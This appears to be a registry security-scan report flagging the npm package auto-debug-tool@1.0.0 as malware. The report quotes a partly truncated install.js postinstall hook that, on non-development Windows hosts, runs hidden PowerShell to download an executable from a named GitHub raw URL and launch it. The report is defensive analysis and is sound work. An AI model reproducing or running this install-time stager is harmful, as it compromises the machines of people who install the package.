registry  /  auto-debug-tool  /  1.0.0

auto-debug-tool@1.0.0

Does something useful like string formatting

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Installing the package triggers a Windows-only hidden PowerShell payload. It downloads an EXE to `%TEMP%` and executes it.

Static reason
One or more suspicious static signals were detected.; previous stored version diff introduced dangerous source
Trigger
`npm install` / lifecycle `postinstall` on Windows when `NODE_ENV` is not `development`.
Impact
Unconsented remote executable download and execution, enabling host compromise.
Mechanism
Hidden PowerShell download-and-execute stager.
Attack narrative
The `postinstall` lifecycle hook invokes `install.js`. On Windows outside development mode, it silently runs PowerShell with execution-policy bypass, downloads `npm-sc-legit.exe` from a GitHub raw URL into `%TEMP%`, and launches it hidden. The README independently describes an npm-install stager/C2 chain and process hollowing, confirming malicious intent.
Rationale
Source inspection confirms an unconsented install-time remote binary download and hidden execution. The utility exports are a cover for the lifecycle payload.
Evidence
package.jsoninstall.jsREADME.mdindex.js%TEMP%\npm-sc.exe
Network endpoints2
raw.githubusercontent.com/cphc811-ui/d3d/main/npm-sc-legit.execphc811-ui/d3d

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` runs `node install.js` via `postinstall`.
  • `install.js` gates execution to non-development Windows hosts.
  • `install.js` invokes hidden PowerShell with execution-policy bypass.
  • `install.js` downloads and starts `npm-sc-legit.exe` from GitHub.
  • `README.md` documents npm-install malware staging, C2 download, and process hollowing.
Evidence against
  • `index.js` only exports basic string and sleep utilities.
  • No benign purpose explains the hidden install-time binary download and execution.
Behavioral surface
Source
ChildProcessEnvironmentVars
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 771 B of source, external domains: raw.githubusercontent.com

Source & flagged code

4 flagged · loading source
package.jsonView file
scripts.postinstall = node install.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node install.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
install.jsView file
1// npm postinstall — download and execute RAT from GitHub L2: if (process.platform !== 'win32') process.exit(0); L3: if (process.env.NODE_ENV === 'development') process.exit(0); L4: try { L5: require('child_process').execSync( L6: `powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$u='https://raw.githubusercontent.com/cphc811-ui/d3d/main/npm[redacted]';$p=$env:TEMP+'\npm-sc.exe';(New-Object Net.WebCl... L7: { timeout: 60000 }
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

install.jsView on unpkg · L1
matchType = previous_version_dangerous_delta matchedPackage = auto-debug-tool@1.0.3 matchedIdentity = npm:YXV0by1kZWJ1Zy10b29s:1.0.3 similarity = 0.500 summary = stored previous version shares package body but lacks this dangerous source file
High
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review.

install.jsView on unpkg

Findings

3 High3 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighSandbox Evasion Gated Capabilityinstall.js
HighPrevious Version Dangerous Deltainstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowUrl Strings